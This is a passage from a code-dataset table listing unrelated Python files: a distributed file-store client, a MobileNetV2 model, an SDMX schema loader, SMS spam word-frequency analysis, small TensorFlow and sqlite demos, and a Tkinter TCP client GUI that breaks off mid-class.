index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
23,400 | 03235ed81d5676b2069431c5fb4b4b6e0344dcc5 | import rpyc
import hashlib
import os
import sys
from metastore import ErrorResponse
import time
"""
A client is a program that interacts with SurfStore. It is used to create,
modify, read, and delete files. Your client will call the various file
modification/creation/deletion RPC calls. We will be testing your service with
our own client, and your client with instrumented versions of our service.
"""
class SurfStoreClient():
"""
Initialize the client and set up connections to the block stores and
metadata store using the config file
"""
def __init__(self, config):
config_file = open(config, 'r')
arr = []
for line in config_file.readlines():
arr.append(line)
config_file.close()
self.numBlockStores=arr[0].split(": ")[1]
self.metastore=rpyc.connect(arr[1].split(": ")[1].split(":")[0],arr[1].split(": ")[1].split(":")[1].strip())
self.blockstore=[]
for line in arr[2:]:
if line.strip() == "" or line == "\r\n":
continue
block_connect=rpyc.connect(line.split(": ")[1].split(":")[0], line.split(": ")[1].split(":")[1].strip())
self.blockstore.append(block_connect)
"""
upload(filepath) : Reads the local file, creates a set of
hashed blocks and uploads them onto the MetadataStore
(and potentially the BlockStore if they were not already present there).
"""
def upload(self, filepath):
blockstore_index=self.findServer()
conn = self.metastore
file_name = filepath.split("/")[-1]
(v,hl,bl) = conn.root.read_file(file_name)
upload_file = open(filepath, 'rb')
buffer = b''
count = 0
upload_hl = []
upload_dict = {}
for byte in upload_file:
if count != 0 and count % 4096 == 0:
hash_value=hashlib.sha256(buffer).hexdigest()
upload_hl.append(hash_value)
upload_dict[hash_value]=buffer
buffer = b''
buffer += byte
count += 1
hash_value=hashlib.sha256(buffer).hexdigest()
upload_hl.append(hash_value)
upload_dict[hash_value]=buffer
try:
conn.root.modify_file(file_name, v + 1, upload_hl,blockstore_index)
except Exception as e:
if e.error_type==2:
self.upload(filepath)
if e.error_type == 1:
for value in eval(e.missing_blocks_list):
self.blockstore[blockstore_index].root.store_block(value,upload_dict[value])
print("OK")
"""
delete(filename) : Signals the MetadataStore to delete a file.
"""
def delete(self, filename):
conn = self.metastore
(v,hl,blockstore_index) = conn.root.read_file(filename)
if v==0:
print("Not Found")
return -1
try:
conn.root.delete_file(filename, v + 1)
except Exception as e:
if e.error_type==2:
self.delete(filename)
print('OK')
# check if succeed
"""
download(filename, dst) : Downloads a file (f) from SurfStore and saves
it to (dst) folder. Ensures not to download unnecessary blocks.
"""
def download(self, filename, location):
(v,hl,blockstore_index)=self.metastore.root.read_file(filename)
# print(v,hl)
if len(hl)==0:
print("Not Found")
return -1
else:
content=b''
for h in hl:
# blockstore_index=self.findServer()
buffer=self.blockstore[blockstore_index].root.get_block(h)
content+=buffer
filepath=location+"/"+filename
file=open(filepath,'wb')
file.write(content)
file.close()
print('OK')
def findServer(self):
blockstore_index=0
min_RTT=sys.maxsize
for i in range(len(self.blockstore)):
send_out=time.time()
self.blockstore[i].ping()
recv=time.time()
RTT=round(recv-send_out,4)
if RTT<min_RTT:
blockstore_index=i
min_RTT=RTT
return blockstore_index
if __name__ == '__main__':
client = SurfStoreClient(sys.argv[1])
operation = sys.argv[2]
if operation == 'upload':
client.upload(sys.argv[3])
elif operation == 'download':
client.download(sys.argv[3], sys.argv[4])
elif operation == 'delete':
client.delete(sys.argv[3])
else:
print("Invalid operation")
|
23,401 | 96963609308efcb29dc16fe331068b7b9198c25b | import torch
import torch.nn as nn
import torch.nn.functional as F
class MobileNetV2(nn.Module):
def __init__(self, num_classes=10):
super().__init__()
self.conv1 = nn.Conv2d(3, 32, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
self.bn1 = nn.BatchNorm2d(32, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_0_conv1 = nn.Conv2d(32, 32, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_0_bn1 = nn.BatchNorm2d(32, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_0_conv2 = nn.Conv2d(32, 32, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), groups=32, bias=False)
self.layers_0_bn2 = nn.BatchNorm2d(32, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_0_conv3 = nn.Conv2d(32, 16, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_0_bn3 = nn.BatchNorm2d(16, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_0_shortcut_0 = nn.Conv2d(32, 16, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_0_shortcut_1 = nn.BatchNorm2d(16, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_1_conv1 = nn.Conv2d(16, 96, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_1_bn1 = nn.BatchNorm2d(96, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_1_conv2 = nn.Conv2d(96, 96, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), groups=96, bias=False)
self.layers_1_bn2 = nn.BatchNorm2d(96, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_1_conv3 = nn.Conv2d(96, 24, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_1_bn3 = nn.BatchNorm2d(24, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_1_shortcut_0 = nn.Conv2d(16, 24, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_1_shortcut_1 = nn.BatchNorm2d(24, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_2_conv1 = nn.Conv2d(24, 144, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_2_bn1 = nn.BatchNorm2d(144, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_2_conv2 = nn.Conv2d(144, 144, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), groups=144, bias=False)
self.layers_2_bn2 = nn.BatchNorm2d(144, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_2_conv3 = nn.Conv2d(144, 24, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_2_bn3 = nn.BatchNorm2d(24, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_2_shortcut = nn.Sequential()
self.layers_3_conv1 = nn.Conv2d(24, 144, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_3_bn1 = nn.BatchNorm2d(144, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_3_conv2 = nn.Conv2d(144, 144, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), groups=144, bias=False)
self.layers_3_bn2 = nn.BatchNorm2d(144, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_3_conv3 = nn.Conv2d(144, 32, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_3_bn3 = nn.BatchNorm2d(32, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_4_conv1 = nn.Conv2d(32, 192, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_4_bn1 = nn.BatchNorm2d(192, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_4_conv2 = nn.Conv2d(192, 192, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), groups=192, bias=False)
self.layers_4_bn2 = nn.BatchNorm2d(192, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_4_conv3 = nn.Conv2d(192, 32, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_4_bn3 = nn.BatchNorm2d(32, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_4_shortcut = nn.Sequential()
self.layers_5_conv1 = nn.Conv2d(32, 192, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_5_bn1 = nn.BatchNorm2d(192, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_5_conv2 = nn.Conv2d(192, 192, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), groups=192, bias=False)
self.layers_5_bn2 = nn.BatchNorm2d(192, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_5_conv3 = nn.Conv2d(192, 32, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_5_bn3 = nn.BatchNorm2d(32, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_5_shortcut = nn.Sequential()
self.layers_6_conv1 = nn.Conv2d(32, 192, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_6_bn1 = nn.BatchNorm2d(192, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_6_conv2 = nn.Conv2d(192, 192, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), groups=192, bias=False)
self.layers_6_bn2 = nn.BatchNorm2d(192, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_6_conv3 = nn.Conv2d(192, 64, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_6_bn3 = nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_7_conv1 = nn.Conv2d(64, 384, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_7_bn1 = nn.BatchNorm2d(384, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_7_conv2 = nn.Conv2d(384, 384, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), groups=384, bias=False)
self.layers_7_bn2 = nn.BatchNorm2d(384, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_7_conv3 = nn.Conv2d(384, 64, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_7_bn3 = nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_7_shortcut = nn.Sequential()
self.layers_8_conv1 = nn.Conv2d(64, 384, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_8_bn1 = nn.BatchNorm2d(384, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_8_conv2 = nn.Conv2d(384, 384, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), groups=384, bias=False)
self.layers_8_bn2 = nn.BatchNorm2d(384, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_8_conv3 = nn.Conv2d(384, 64, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_8_bn3 = nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_8_shortcut = nn.Sequential()
self.layers_9_conv1 = nn.Conv2d(64, 384, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_9_bn1 = nn.BatchNorm2d(384, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_9_conv2 = nn.Conv2d(384, 384, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), groups=384, bias=False)
self.layers_9_bn2 = nn.BatchNorm2d(384, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_9_conv3 = nn.Conv2d(384, 64, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_9_bn3 = nn.BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_9_shortcut = nn.Sequential()
self.layers_10_conv1 = nn.Conv2d(64, 384, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_10_bn1 = nn.BatchNorm2d(384, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_10_conv2 = nn.Conv2d(384, 384, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), groups=384, bias=False)
self.layers_10_bn2 = nn.BatchNorm2d(384, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_10_conv3 = nn.Conv2d(384, 96, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_10_bn3 = nn.BatchNorm2d(96, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_10_shortcut_0 = nn.Conv2d(64, 96, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_10_shortcut_1 = nn.BatchNorm2d(96, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_11_conv1 = nn.Conv2d(96, 576, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_11_bn1 = nn.BatchNorm2d(576, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_11_conv2 = nn.Conv2d(576, 576, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), groups=576, bias=False)
self.layers_11_bn2 = nn.BatchNorm2d(576, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_11_conv3 = nn.Conv2d(576, 96, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_11_bn3 = nn.BatchNorm2d(96, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_11_shortcut = nn.Sequential()
self.layers_12_conv1 = nn.Conv2d(96, 576, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_12_bn1 = nn.BatchNorm2d(576, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_12_conv2 = nn.Conv2d(576, 576, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), groups=576, bias=False)
self.layers_12_bn2 = nn.BatchNorm2d(576, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_12_conv3 = nn.Conv2d(576, 96, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_12_bn3 = nn.BatchNorm2d(96, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_12_shortcut = nn.Sequential()
self.layers_13_conv1 = nn.Conv2d(96, 576, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_13_bn1 = nn.BatchNorm2d(576, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_13_conv2 = nn.Conv2d(576, 576, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), groups=576, bias=False)
self.layers_13_bn2 = nn.BatchNorm2d(576, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_13_conv3 = nn.Conv2d(576, 160, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_13_bn3 = nn.BatchNorm2d(160, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_14_conv1 = nn.Conv2d(160, 960, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_14_bn1 = nn.BatchNorm2d(960, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_14_conv2 = nn.Conv2d(960, 960, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), groups=960, bias=False)
self.layers_14_bn2 = nn.BatchNorm2d(960, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_14_conv3 = nn.Conv2d(960, 160, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_14_bn3 = nn.BatchNorm2d(160, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_14_shortcut = nn.Sequential()
self.layers_15_conv1 = nn.Conv2d(160, 960, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_15_bn1 = nn.BatchNorm2d(960, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_15_conv2 = nn.Conv2d(960, 960, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), groups=960, bias=False)
self.layers_15_bn2 = nn.BatchNorm2d(960, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_15_conv3 = nn.Conv2d(960, 160, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_15_bn3 = nn.BatchNorm2d(160, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_15_shortcut = nn.Sequential()
self.layers_16_conv1 = nn.Conv2d(160, 960, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_16_bn1 = nn.BatchNorm2d(960, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_16_conv2 = nn.Conv2d(960, 960, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), groups=960, bias=False)
self.layers_16_bn2 = nn.BatchNorm2d(960, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_16_conv3 = nn.Conv2d(960, 320, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_16_bn3 = nn.BatchNorm2d(320, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layers_16_shortcut_0 = nn.Conv2d(160, 320, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layers_16_shortcut_1 = nn.BatchNorm2d(320, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.conv2 = nn.Conv2d(320, 1280, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.bn2 = nn.BatchNorm2d(1280, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.linear = nn.Linear(in_features=1280, out_features=100, bias=True)
def forward(self, x):
x = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.layers_0_bn1(self.layers_0_conv1(x)))
out = F.relu(self.layers_0_bn2(self.layers_0_conv2(out)))
out = self.layers_0_bn3(self.layers_0_conv3(out))
x = out + self.layers_0_shortcut_1(self.layers_0_shortcut_0(x))
out = F.relu(self.layers_1_bn1(self.layers_1_conv1(x)))
out = F.relu(self.layers_1_bn2(self.layers_1_conv2(out)))
out = self.layers_1_bn3(self.layers_1_conv3(out))
x = out + self.layers_1_shortcut_1(self.layers_1_shortcut_0(x))
out = F.relu(self.layers_2_bn1(self.layers_2_conv1(x)))
out = F.relu(self.layers_2_bn2(self.layers_2_conv2(out)))
out = self.layers_2_bn3(self.layers_2_conv3(out))
x = out + self.layers_2_shortcut(x)
out = F.relu(self.layers_3_bn1(self.layers_3_conv1(x)))
out = F.relu(self.layers_3_bn2(self.layers_3_conv2(out)))
out = self.layers_3_bn3(self.layers_3_conv3(out))
x = out
out = F.relu(self.layers_4_bn1(self.layers_4_conv1(x)))
out = F.relu(self.layers_4_bn2(self.layers_4_conv2(out)))
out = self.layers_4_bn3(self.layers_4_conv3(out))
x = out + self.layers_4_shortcut(x)
out = F.relu(self.layers_5_bn1(self.layers_5_conv1(x)))
out = F.relu(self.layers_5_bn2(self.layers_5_conv2(out)))
out = self.layers_5_bn3(self.layers_5_conv3(out))
x = out + self.layers_5_shortcut(x)
out = F.relu(self.layers_6_bn1(self.layers_6_conv1(x)))
out = F.relu(self.layers_6_bn2(self.layers_6_conv2(out)))
out = self.layers_6_bn3(self.layers_6_conv3(out))
x = out
out = F.relu(self.layers_7_bn1(self.layers_7_conv1(x)))
out = F.relu(self.layers_7_bn2(self.layers_7_conv2(out)))
out = self.layers_7_bn3(self.layers_7_conv3(out))
x = out + self.layers_7_shortcut(x)
out = F.relu(self.layers_8_bn1(self.layers_8_conv1(x)))
out = F.relu(self.layers_8_bn2(self.layers_8_conv2(out)))
out = self.layers_8_bn3(self.layers_8_conv3(out))
x = out + self.layers_8_shortcut(x)
out = F.relu(self.layers_9_bn1(self.layers_9_conv1(x)))
out = F.relu(self.layers_9_bn2(self.layers_9_conv2(out)))
out = self.layers_9_bn3(self.layers_9_conv3(out))
x = out + self.layers_9_shortcut(x)
out = F.relu(self.layers_10_bn1(self.layers_10_conv1(x)))
out = F.relu(self.layers_10_bn2(self.layers_10_conv2(out)))
out = self.layers_10_bn3(self.layers_10_conv3(out))
x = out + self.layers_10_shortcut_1(self.layers_10_shortcut_0(x))
out = F.relu(self.layers_11_bn1(self.layers_11_conv1(x)))
out = F.relu(self.layers_11_bn2(self.layers_11_conv2(out)))
out = self.layers_11_bn3(self.layers_11_conv3(out))
x = out + self.layers_11_shortcut(x)
out = F.relu(self.layers_12_bn1(self.layers_12_conv1(x)))
out = F.relu(self.layers_12_bn2(self.layers_12_conv2(out)))
out = self.layers_12_bn3(self.layers_12_conv3(out))
x = out + self.layers_12_shortcut(x)
out = F.relu(self.layers_13_bn1(self.layers_13_conv1(x)))
out = F.relu(self.layers_13_bn2(self.layers_13_conv2(out)))
out = self.layers_13_bn3(self.layers_13_conv3(out))
x = out
out = F.relu(self.layers_14_bn1(self.layers_14_conv1(x)))
out = F.relu(self.layers_14_bn2(self.layers_14_conv2(out)))
out = self.layers_14_bn3(self.layers_14_conv3(out))
x = out + self.layers_14_shortcut(x)
out = F.relu(self.layers_15_bn1(self.layers_15_conv1(x)))
out = F.relu(self.layers_15_bn2(self.layers_15_conv2(out)))
out = self.layers_15_bn3(self.layers_15_conv3(out))
x = out + self.layers_15_shortcut(x)
out = F.relu(self.layers_16_bn1(self.layers_16_conv1(x)))
out = F.relu(self.layers_16_bn2(self.layers_16_conv2(out)))
out = self.layers_16_bn3(self.layers_16_conv3(out))
x = out + self.layers_16_shortcut_1(self.layers_16_shortcut_0(x))
x = F.relu(self.bn2(self.conv2(x)))
x = F.avg_pool2d(x,4)
x = x.view(x.size(0), -1)
x = self.linear(x)
return x
def mobilenetv2(**kwargs):
return MobileNetV2(**kwargs)
|
23,402 | a15b2386db70a758d7d5f9d3d7dc5777eb3d25e9 | import os
from urllib.request import urlopen
from xml.etree import ElementTree as ET
from io import StringIO
from sdg.schemas import SchemaInputBase
from sdg import helpers
class SchemaInputSdmxMsd(SchemaInputBase):
"""Input schema from SDMX MSD."""
def load_schema(self):
"""Import the SDMX MSD into JSON Schema. Overrides parent."""
schema = {
"type": "object",
"properties": {}
}
msd = self.parse_xml(self.schema_path)
for concept in msd.findall('.//Concept'):
concept_id = self.alter_key(concept.attrib['id'])
self.add_item_to_field_order(concept_id)
concept_name = concept.find('./Name').text
concept_description = concept.find('./Description').text
parent = concept.find('./Parent/Ref')
key_parts = [concept_id, concept_id] if parent is None else [parent.attrib['id'], concept_id]
translation_key = '.'.join(key_parts)
jsonschema_field = {
'type': ['string', 'null'],
'title': concept_name,
'description': concept_description,
'translation_key': translation_key,
}
if self.scope is not None:
jsonschema_field['scope'] = self.scope
schema['properties'][concept_id] = jsonschema_field
self.schema = schema
def parse_xml(self, location, strip_namespaces=True):
return helpers.sdmx.parse_xml(location, request_params=self.request_params)
def fetch_file(self, location):
return helpers.files.read_file(location, request_params=self.request_params)
|
23,403 | 2dbad7828489743eb6425180b530e74478a35924 | import pandas as pd
import csv
from nltk.stem import PorterStemmer
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
import re
ps = PorterStemmer()
stop_words = set(stopwords.words('english'))
# Stems words to their root words and removes all characters that are not alphabets
def stem_str(str):
ret_str = ""
for w in word_tokenize(str.lower()):
if w not in stop_words and w.isalpha() and len(w) > 1:
ret_str = ret_str + " " + ps.stem(w)
ret_str = re.sub("[^a-zA-Z]", " ", ret_str)
return ret_str.strip()
# Gets the count of most frequent words give a dataframe
def word_freq(df):
word_frequency = {}
word_frequency_lst = []
for index,row in df.iterrows():
for w in word_tokenize(row['stemmed_sms']):
if w not in word_frequency:
word_frequency[w] = 1
else:
word_frequency[w] += 1
for key, value in word_frequency.items():
temp = [key, value]
word_frequency_lst.append(temp)
word_freq_df = pd.DataFrame(word_frequency_lst, columns=["Unique Words", 'Frequency'])
word_freq_df = word_freq_df.sort_values(['Frequency'], ascending=False)
return word_freq_df
if __name__ == '__main__':
#Reading in the file via csv library
filepath = 'C:\\Users\\Joash\\Desktop\\University Stuff\\4B uni stuff\\SYDE 522\\522 Project\\SMS_spam_or_ham\\spam'
csvfile = open(filepath + '.csv', "rt")
reader = csv.reader(csvfile)
count = 0
data =[]
for row in reader:
data.append(row)
count+=1
data = data[1:]
df = pd.DataFrame(data, columns=['class', 'sms'])
#stemming and the removal of stop words via stem_str() function
df['stemmed_sms'] = df.loc[:,'sms'].apply(lambda x: stem_str(str(x)))
#Adding a length column to the dataframe
df['len_original_test'] = df.loc[:,'sms'].apply(lambda x: len(x))
df['len_clean_text'] = df.loc[:,'stemmed_sms'].apply(lambda x: len(x))
# Printing out the stemmed words to csv
df.to_csv(filepath + '_result.csv', index=False)
# Everything from here on out is EDA
#getting the most frequent spam unique words
spam_df = df[df['class'] == 'spam']
# print(spam_df)
spam_word_freq = word_freq(spam_df)
print("Top 10 most occuring spam unique words are:")
print(spam_word_freq[0:9])
## Prints out the word frequency of spam words to csv
# spam_word_freq.to_csv(filepath + '_freq.csv', index=False)
#getting the most frequent ham unique words
ham_df = df[df['class'] == 'ham']
# print(ham_df)
ham_word_freq = word_freq(ham_df)
## Prints out the word frequency of ham words to csv
# ham_word_freq.to_csv(filepath + '_freq.csv', index=False)
print("Top 10 most occuring ham unique words are:")
print(ham_word_freq[0:9])
#getting the most frequent unique words (ham or spam)
word_freq = word_freq(df)
## Prints out the word frequency of words to csv
# word_freq.to_csv(filepath + '_freq.csv', index=False)
print("Top 10 most occuring unique words are in the whole dataset are:")
print(word_freq[0:9])
print("The total number of unique words are", len(word_freq))
# Getting the data class labels and their counts
count_spam =df[df['class'] == 'spam']['class'].count()
print()
print('Count of spam class is',count_spam)
count_ham =df[df['class'] == 'ham']['class'].count()
print()
print('Count of ham class is',count_ham)
|
23,404 | 5ccb6e5762711fcafc9245fb7f355cfed56c17d1 | import tensorflow as tf
a = tf.Variable(1) #변수 선언
b = tf.Variable(2)
c = tf.multiply(a ,b) #Mul하는 그래프 생성
init = tf.global_variables_initializer() #*변수 사용을 위해 초기화를 해줘야함!
sess = tf.Session() #흐름 실행을 위한 Session생성
sess.run(init) #초기화 수행 후
print(sess.run(c)) #c 실행
|
23,405 | 3e3963f5b525291c5a19f6b294dc1dcf553f9387 | import sqlite3
# Creates or opens connection to db file
conn = sqlite3.connect('first_db.sqlite')
conn.row_factory = sqlite3.Row # Upgrade row_factory
# Create a table
conn.execute('create table if not exists phones (brand text, version interger)')
# Add some data
conn.execute('insert into phones values ("Android", 5)')
conn.execute('insert into phones values ("iPhone", 6)')
conn.commit() # Finalize updates
for row in conn.execute('select * from phones'):
print(row)
for row in conn.execute('select * from phones'):
print (row[0]) # The brand
print (row[1]) # The version
conn.commit() # Ask the database to save changes - dont forget!
for row in conn.execute('select * from phones'):
print(row['brand'])
print(row['version'])
conn.close() # And close connection.
|
23,406 | 41a986ee3a9a23220e6673f4178cedb8de89bf37 | from chain_map import linear_extension
from cells import Simplex, CubicalCell
@linear_extension
def AW(cell):
if isinstance(cell, Simplex):
return cell.AW()
elif isinstance(cell, CubicalCell):
return cell.AW()
else:
raise NotImplementedError('Alexander-Whitney diagonal approximation is only defined'
' for simplices or cubical cells.')
if __name__ == '__main__':
print(Simplex((0, 1, 2)).AW())
|
23,407 | 188b86a0ffe57767a4fa6645acdb6c949154a3ac | #!/usr/bin/env python3
import collections
def hamming2(s1, s2):
"""Calculate the Hamming distance between two bit strings"""
assert len(s1) == len(s2)
return sum(c1 != c2 for c1, c2 in zip(s1, s2))
def main():
twos = 0
threes = 0
with open('in.txt', 'r') as f:
data = f.read().split()
for line in data:
for line2 in data:
if hamming2(line, line2) == 1:
print(line, line2)
break
if __name__ == '__main__':
main() |
23,408 | 126cf8559414331c1804477eace1b34fe3f5fe26 | import tkinter as Tk
import socket
import threading
import json
class ClientGui:
def __init__(self, master, cmd_start, cmd_stop):
self.start_button_val = Tk.IntVar()
self.serverIP = Tk.StringVar()
self.serverPort = Tk.StringVar()
self.serverIP.set("192.168.0.34")
self.serverPort.set("5555")
self.start_button = Tk.Checkbutton(master, text="Connect to\nServer", command=lambda: self.manage_start_button(cmd_start, cmd_stop), font="Arial 12", variable=self.start_button_val, indicatoron=False, width=10, height=3)
self.IP_label_name = Tk.Label(master, text="TCP Server IP", width=15, font="Arial 12")
vcmd1 = master.register(self.validateIP) # we have to wrap the command
self.IP_entry_value = Tk.Entry(master, width=15, font="Arial 12", validate="key", validatecommand=(vcmd1, '%S','%P'), textvariable=self.serverIP)
self.Port_label_name = Tk.Label(master, text="TCP Server Port", width=15, font="Arial 12")
vcmd2 = master.register(self.validatePort) # we have to wrap the command
self.Port_entry_value = Tk.Entry(master, width=10, font="Arial 12", validate="key", validatecommand=(vcmd2,'%S', '%P'), textvariable=self.serverPort)
self.qtFrame = Tk.LabelFrame(master, text="QT7 Xpro Simulator", width=400, height=400, bd=1, relief="ridge")
self.sliderVal = Tk.DoubleVar()
self.sliderWid = Tk.Scale(self.qtFrame, variable = self.sliderVal, font="Arial 15", from_ = 0, to = 255, orient = Tk.HORIZONTAL,
sliderlength = 30, width = 57, length = 300, state = "disabled", showvalue = 0)
self.sliderBt1Val = Tk.IntVar()
self.sliderBt1 = Tk.Checkbutton(self.qtFrame, text="1", font="Arial 15", indicatoron=False, width=5, height=2, variable=self.sliderBt1Val, state = "disabled")
self.sliderBt2Val = Tk.IntVar()
self.sliderBt2 = Tk.Checkbutton(self.qtFrame, text="2", font="Arial 15", indicatoron=False, width=5, height=2, variable=self.sliderBt2Val, state = "disabled")
self.IP_label_name.grid(row=1, column=0, padx=5, pady=5, sticky="e")
self.IP_entry_value.grid(row=1, column=1, padx=5, pady=5)
self.Port_label_name.grid(row=2, column=0, padx=5, pady=5, sticky="e")
self.Port_entry_value.grid(row=2, column=1, padx=5, pady=5, sticky="w")
self.start_button.grid(row=1, column=2, rowspan=2, columnspan=1, padx=5, pady=5)
self.qtFrame.grid(row=3, column=0,rowspan=5, columnspan=5, padx=5, pady=5)
self.sliderWid.grid(row=5, column=1, rowspan=2, columnspan=2, padx=5, pady=5)
self.sliderBt1.grid(row=4, column=0, rowspan=1, columnspan=1, padx=5, pady=5)
self.sliderBt2.grid(row=5, column=0, rowspan=1, columnspan=1, padx=5, pady=5)
def greet_func(self):
self.start_button.config(text="Disconnect")
self.IP_entry_value.config(state="disabled")
self.Port_entry_value.config(state="disabled")
def bye_func(self):
self.start_button.config(text="Connect to\nServer")
self.start_button_val.set(0)
self.IP_entry_value.config(state="normal")
self.Port_entry_value.config(state="normal")
def submit_cmd(self):
